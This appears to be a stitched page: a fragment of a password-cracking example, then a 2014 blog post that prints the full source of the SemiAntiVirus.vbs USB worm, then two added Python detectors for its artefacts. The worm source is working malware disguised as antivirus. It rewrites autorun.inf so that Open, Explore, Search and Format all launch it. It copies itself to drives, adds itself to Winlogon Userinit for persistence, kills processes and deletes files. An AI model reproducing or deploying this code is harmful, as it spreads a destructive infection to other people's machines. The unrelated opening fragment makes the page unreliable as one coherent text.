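    print(crack_pbkdf2(hash_password("letmein"), WORDLIST))               # letmein, far slower
    print(crack_pbkdf2(hash_password("correct horse battery"), WORDLIST))  # None
```

A weak password is recovered in both cases; what changes is the cost per guess (tens of thousands of HMACs instead of one md5) and the fact that the salt makes rainbow tables and cross-account reuse useless, so the only fix for the password itself is a stronger one.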

Saturday, February 15, 2014

SemiAntiVirus.vbs, the VB script that went viral around 4-5 years ago!


Here is the script if any one is interested.


This is the auto run file

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: you can no longer assume that formatting an infected USB drive from Explorer is a safe way to get rid of the virus, because the autorun file above hooks that menu entry too. As the file shows, the script is launched in five ways:

1. Opening the drive
2. Using the AutoPlay feature
3. Exploring it (right-click and select Explore)
4. Searching for files saved on the USB drive
5. Formatting it from the context menu

Interesting!!
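Added example, not part of the original post: a small checker that reads an autorun.inf, lists every verb that launches a script host, and inspects a Winlogon Userinit value for extra programs (the script's own persistence, set further down in the listing, appends wscript.exe and itself to that value). The autorun.inf text is a copy of the one above; the Userinit strings are constructed.

```python
"""Flag autorun.inf verbs that launch a script host, and check Winlogon's
Userinit value for extra programs.

Added example, not part of the original post. The autorun.inf text is a
copy of the one shown above; the Userinit values are constructed.
"""
import configparser
import re
from typing import Dict, List, Tuple

AUTORUN_INF = r"""
[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs
"""

# Interpreters that a legitimate autorun entry on removable media never needs.
SCRIPT_HOSTS = re.compile(
    r"\b(wscript|cscript|mshta|powershell|cmd|rundll32|regsvr32)(\.exe)?\b", re.I)


def parse_autorun(text: str) -> Dict[str, str]:
    """autorun.inf is INI-like; keep key case, treat '%' literally."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # backslashes and case are part of the key
    cp.read_string(text)
    return dict(cp["autorun"]) if cp.has_section("autorun") else {}


def suspicious_autorun_entries(text: str) -> List[Tuple[str, str]]:
    """Every 'open' or 'shell\\...\\Command' entry that runs a script host.
    Each is a context-menu verb (Open, Explore, Search, Format, AutoPlay)
    that would execute the script instead of doing what the menu says."""
    hits = []
    for key, value in parse_autorun(text).items():
        k = key.lower()
        if (k == "open" or k.endswith("\\command")) and SCRIPT_HOSTS.search(value):
            hits.append((key, value))
    return hits


def extra_userinit_programs(value: str) -> List[str]:
    """Winlogon\\Userinit is a comma-separated list; anything besides
    userinit.exe is a persistence entry that runs at every logon."""
    parts = [p.strip() for p in value.split(",") if p.strip()]
    return [p for p in parts if not p.lower().endswith("userinit.exe")]


if __name__ == "__main__":
    for key, value in suspicious_autorun_entries(AUTORUN_INF):
        print(f"{key} -> {value}")
    print(extra_userinit_programs(r"C:\Windows\system32\userinit.exe,"))  # []
    print(extra_userinit_programs(
        r"C:\Windows\system32\userinit.exe,"
        r"C:\Windows\system32\wscript.exe C:\Windows\system32\SemiAntiVirus.vbs"))
```

Whatever the context menu says, every entry maps to wscript.exe SemiAntiVirus.vbs, so the drive should be cleaned from a command prompt with AutoPlay disabled, not from the Explorer menu.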

The actual virus script, which can be found in C:\Windows\System32\SemiAntiVirus.vbs:

To tell the truth, I do not understand a single line of this code (except the italicized part, which has a good sense of humor), but I hope it helps the computer geeks in finding a solution.

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program. 
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub
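The five triggers listed at the top of this post are all visible in the autorun.inf that the crinf sub writes: every Explorer verb (open, Explore, Find, Format..., AutoPlay) is redirected to "wscript.exe SemiAntiVirus.vbs", and the Winlogon Userinit value gets a second command appended so the script runs again at logon. The following Python is an added example, not code from the post or from the script's author, that checks both artefacts offline. The sample autorun.inf is copied from the crinf sub; the sample Userinit value is a constructed string assuming the usual C:\Windows\system32 system directory.

```python
"""Added example: offline checks for the two persistence artefacts used by the
SemiAntiVirus.vbs listing (autorun.inf verb hijacking and an extra Winlogon
Userinit command). Sample inputs are constructed; nothing here touches the
registry or any drive."""
import ntpath

# Constructed sample: the autorun.inf that the crinf sub in the listing writes.
SAMPLE_AUTORUN_INF = """[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\\System32\\SHELL32.dll,8
action=Open folder to view files
shell\\open=Open
shell\\open\\Command=wscript.exe SemiAntiVirus.vbs
shell\\Auto=AutoPlay
shell\\Auto\\Command=wscript.exe SemiAntiVirus.vbs
shell\\Explore\\Command=wscript.exe SemiAntiVirus.vbs
shell\\Find=Search...
shell\\Find\\Command=wscript.exe SemiAntiVirus.vbs
shell\\Format...=Format...
shell\\Format...\\Command=wscript.exe SemiAntiVirus.vbs
"""

# Constructed sample of a harmless autorun.inf (icon and label only).
BENIGN_AUTORUN_INF = """[autorun]
icon=setup.exe,0
label=Vendor Disc
"""

# Constructed sample of the Userinit value after the listing's RegWrite call
# (assumes the system directory is C:\Windows\system32).
SAMPLE_USERINIT = ("C:\\Windows\\system32\\userinit.exe,"
                   "C:\\Windows\\system32\\wscript.exe C:\\Windows\\system32\\SemiAntiVirus.vbs")

SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "cmd", "powershell"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".hta")


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lower-cased."""
    keys = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip().lower()] = value.strip()
    return keys


def _first_token(command):
    """First program name of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def suspicious_autorun_handlers(text):
    """Handlers (open, shellexecute, shell\\<verb>\\command) whose command line
    starts a script host or names a script file. Returns (key, value) pairs."""
    found = []
    for key, value in parse_autorun(text).items():
        is_handler = key in ("open", "shellexecute") or key.endswith("\\command")
        if not is_handler:
            continue
        exe = ntpath.splitext(ntpath.basename(_first_token(value)))[0].lower()
        runs_script = any(tok.lower().endswith(SCRIPT_EXTS) for tok in value.split())
        if exe in SCRIPT_HOSTS or runs_script:
            found.append((key, value))
    return found


def suspicious_userinit(value):
    """Comma-separated Userinit entries other than userinit.exe itself; Winlogon
    runs each of them at logon, which is how the listing relaunches itself."""
    extras = []
    for entry in value.split(","):
        entry = entry.strip()
        if entry and ntpath.basename(_first_token(entry)).lower() != "userinit.exe":
            extras.append(entry)
    return extras


if __name__ == "__main__":
    for key, value in suspicious_autorun_handlers(SAMPLE_AUTORUN_INF):
        print("autorun.inf hijacks", key, "->", value)
    for entry in suspicious_userinit(SAMPLE_USERINIT):
        print("extra Userinit command:", entry)
```

On a live machine the Userinit string would be read from the HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon key named in the listing and the autorun.inf from the root of each removable drive; both are left out so the example runs anywhere. A clean Userinit value contains only userinit.exe (usually with a trailing comma), so anything the second function returns is worth investigating, and any autorun.inf handler that launches a script host rather than an installer is the signature of this family of USB worms.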